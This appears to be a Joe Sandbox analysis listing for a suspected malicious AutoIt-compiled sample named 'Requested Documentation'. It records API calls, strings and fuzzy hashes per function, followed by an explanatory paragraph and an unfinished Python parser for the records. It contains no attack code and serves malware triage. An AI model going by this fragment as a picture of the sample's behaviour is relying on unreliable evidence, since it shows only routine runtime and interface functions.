                                                                              • Opcode ID: 80b0c3863a0ee4a2a0ac7ac24a79f298828fe908dee66d6c6aa2149efa1a521f
                                                                              • Instruction ID: 14fa6e87b5a767d09ed448dd413e44bcebfc0a3fa67906213b6a0ba3485dd3b1
                                                                              • Opcode Fuzzy Hash: 80b0c3863a0ee4a2a0ac7ac24a79f298828fe908dee66d6c6aa2149efa1a521f
                                                                              • Instruction Fuzzy Hash: CF317E71210608AEDB10DF64DC81BFB77B9FF89764F108619F9A5D7190DA31AC92C760
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2911
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: c990ac04a39c98b602c8d860baf783c30b974787a9327af82802d90accce4d4f
                                                                              • Instruction ID: 2c2f809a087a3ab33b52ff269650cfdb66094e5ce6966f812b3396ce555e1758
                                                                              • Opcode Fuzzy Hash: c990ac04a39c98b602c8d860baf783c30b974787a9327af82802d90accce4d4f
                                                                              • Instruction Fuzzy Hash: 99312B755003459FDF26CF5ACE45BAEBBFCEF45350F141029E885A61A2DB709D40CB51
                                                                              APIs
                                                                              • __snwprintf.LIBCMT ref: 009F3A66
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf_memmove
                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                              • API String ID: 3506404897-2584243854
                                                                              • Opcode ID: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
                                                                              • Instruction ID: d4b45604550065f2fb07e3cc048c0b8370563c7586eb4a21600417a93b84f09f
                                                                              • Opcode Fuzzy Hash: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
                                                                              • Instruction Fuzzy Hash: AC214171600219AFCF10EFA5CC81FAEBBB5BF85700F504455F545A7282DB38EA45CB61
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A06761
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A0676C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
                                                                              • Instruction ID: b66b3037001e70e0321c66483c45ec62396b39c6645d529ba4e79f72bc62c32a
                                                                              • Opcode Fuzzy Hash: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
                                                                              • Instruction Fuzzy Hash: C811B67560020DAFEF11DF54DC80EAB376AEB8436CF100129F914972D0D671DC6187A0
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A06C71
                                                                              • GetSysColor.USER32(00000012), ref: 00A06C8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
                                                                              • Instruction ID: a9d8f497e70c836b9cc2108e7edbbac7f4891a0b76ffeeb9a6517c9bb7e96197
                                                                              • Opcode Fuzzy Hash: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
                                                                              • Instruction Fuzzy Hash: 8421297651020DAFDF14DFB8DC45AFA7BB8FB08318F004629F995E2290D635E861DB60
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00A069A2
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A069B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
                                                                              • Instruction ID: 20e49841a03bae350b656820f2961ad37e8ec9cdcefefc4364f27a33847092a2
                                                                              • Opcode Fuzzy Hash: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
                                                                              • Instruction Fuzzy Hash: 8E116D7150020CAFEB108F64AC44AEB3669EB053B8F504724F9A5A75E0C771DC619760
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2A22
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009E2A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
                                                                              • Instruction ID: 0b5bae218dae25375ef4b959d1aeb6693725c43605bf245df2084757851a1dd6
                                                                              • Opcode Fuzzy Hash: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
                                                                              • Instruction Fuzzy Hash: 4311E236D01294EBCB32DBA9DC44BAA73BDAB86304F144031E855E72D1D770ED0AC791
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F222C
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2255
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
                                                                              • Instruction ID: c56e100808e5511209ecddedb86302e982d284fedb3a5a9473b8315b433492ef
                                                                              • Opcode Fuzzy Hash: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
                                                                              • Instruction Fuzzy Hash: CD11E070641229BAEB298F518C95FFBFBACFF06751F10862AFA2456040D2706881D7F1
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009D8E73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
                                                                              • Instruction ID: 162e8cd625ea402f3ed16ee2809cf9ffb4af688bf8ce71ebd909241b696ce821
                                                                              • Opcode Fuzzy Hash: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
                                                                              • Instruction Fuzzy Hash: 4C01F5B1641218ABCF14FBE0CC419FE7369AF81320B504A1AF821573D2DE319809C760
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 009D8D6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
                                                                              • Instruction ID: 9ef452ea82a23f0770818d561d85f753842504261850f32fb8cf0337b0f698be
                                                                              • Opcode Fuzzy Hash: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
                                                                              • Instruction Fuzzy Hash: 3601DFB5A81108BBCF24EBE0C952BFF73A99F55340F60441AB802633E2DE259E08D371
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 009D8DEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
                                                                              • Instruction ID: 726c42289c5f45f94ca6a4cde38ba74c3af42b42afd54775d4590306bee9d45c
                                                                              • Opcode Fuzzy Hash: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
                                                                              • Instruction Fuzzy Hash: 3301A2B1A81109BBDF21FAE4C942BFF77AD9F11300F518516B805A33D2DE259E19D271
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
                                                                              • Instruction ID: 786c3c20067b8b518241557f7ec9c595db90a54e147bf68f942338088c0a80fb
                                                                              • Opcode Fuzzy Hash: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
                                                                              • Instruction Fuzzy Hash: 18E0D13690432C2BD720DB999C45FA7F7ACEB86B71F000057FD04D7051D5609B4687D1
                                                                              APIs
                                                                                • Part of subcall function 009BB314: _memset.LIBCMT ref: 009BB321
                                                                                • Part of subcall function 009A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB2F0,?,?,?,0098100A), ref: 009A0945
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB2F4
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB303
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB2FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 3158253471-631824599
                                                                              • Opcode ID: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
                                                                              • Instruction ID: ca6df35b513dd218c0c460895dcbbd6a600127684c0ee59d10b5862d6ed4ca17
                                                                              • Opcode Fuzzy Hash: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
                                                                              • Instruction Fuzzy Hash: 23E06D742007108FD770DF68E5043867AE8AF84724F018A3DE456C7681E7F5E405CBA1
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009D7C82
                                                                                • Part of subcall function 009A3358: _doexit.LIBCMT ref: 009A3362
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 77c519d01b5eaebffae98b65a1f6067027da724c70e1107e56dec336ec2a2f69
                                                                              • Instruction ID: 794091b901e1c015abd2c71f083288cbce94fd75e28959609b3183af82b79ad9
                                                                              • Opcode Fuzzy Hash: 77c519d01b5eaebffae98b65a1f6067027da724c70e1107e56dec336ec2a2f69
                                                                              • Instruction Fuzzy Hash: DBD05B323C83583BD62532F56C07FCA754C4F46B52F144816FB08696D34DD245D152E5
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 009C1775
                                                                                • Part of subcall function 009FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,009C195E,?), ref: 009FBFFE
                                                                                • Part of subcall function 009FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009FC010
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009C196D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                              • String ID: WIN_XPe
                                                                              • API String ID: 582185067-3257408948
                                                                              • Opcode ID: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
                                                                              • Instruction ID: 8ed217c7c54946723647be0215dd202859fe7d1c70cfdc376e5e1e336e2ae071
                                                                              • Opcode Fuzzy Hash: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
                                                                              • Instruction Fuzzy Hash: FAF0A57080410DDFDB26DBA1C994BECBAF8AB49301F540499E102B6191D7754E86DF66
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A059AE
                                                                              • PostMessageW.USER32(00000000), ref: 00A059B5
                                                                                • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
                                                                              • Instruction ID: 30941cbed10a4a420abc6525a0c72ac6e9e5e95d9284f5ffd52402d73ef33fb4
                                                                              • Opcode Fuzzy Hash: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
                                                                              • Instruction Fuzzy Hash: 8DD0C9317843557BE678ABB09C0BF966615BB44B51F010825B356AA5D4C9E4A802C654
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A0596E
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A05981
                                                                                • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
                                                                              • Instruction ID: 372bfc3cafae136b6c92b2c4e21baad3812129d30edcdc0f148415b69970281b
                                                                              • Opcode Fuzzy Hash: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
                                                                              • Instruction Fuzzy Hash: 67D0C931784355BBE678ABB09C1BF966A15BB40B51F010825B35AAA5D4C9E4A802C654
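The function records above follow one fixed layout (an "APIs" header, then "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity"), which makes them easy to turn into structured data for triage and for pivoting on the Opcode/Instruction fuzzy hashes across samples. The parser below is an added example written for this page, not Joe Sandbox code or part of the report. The regular expressions and the field names it extracts are assumptions derived from the records as rendered here; the embedded sample is two records copied from the listing above (the InternetOpenW/InternetSetOptionW function and the IsDebuggerPresent/OutputDebugStringW function) with the "Associated" dump lines left out. The classification is a heuristic added for illustration: the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is the diagnostic that ATL's CAtlBaseModule constructor emits, so that particular IsDebuggerPresent call is compiler-runtime boilerplate rather than custom anti-analysis logic, which is the caveat a practitioner would want before counting it as an anti-debug capability of the sample.

```python
"""Parser for the Joe Sandbox 'IDA Plugin' function records listed above (added
example, not Joe Sandbox code). A record opens with 'APIs' and continues with
'Strings', 'Memory Dump Source', 'Joe Sandbox IDA Plugin' and 'Similarity'."""
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# 'Name.MODULE(args), ref: ADDR' or 'Name.MODULE ref: ADDR' (no argument list)
CALL_RE = re.compile(r"(?P<name>[\w@?$]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
STRING_RE = re.compile(r"(?P<text>.*), xrefs:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"(?P<key>[^:]+):\s*(?P<value>.*)$")
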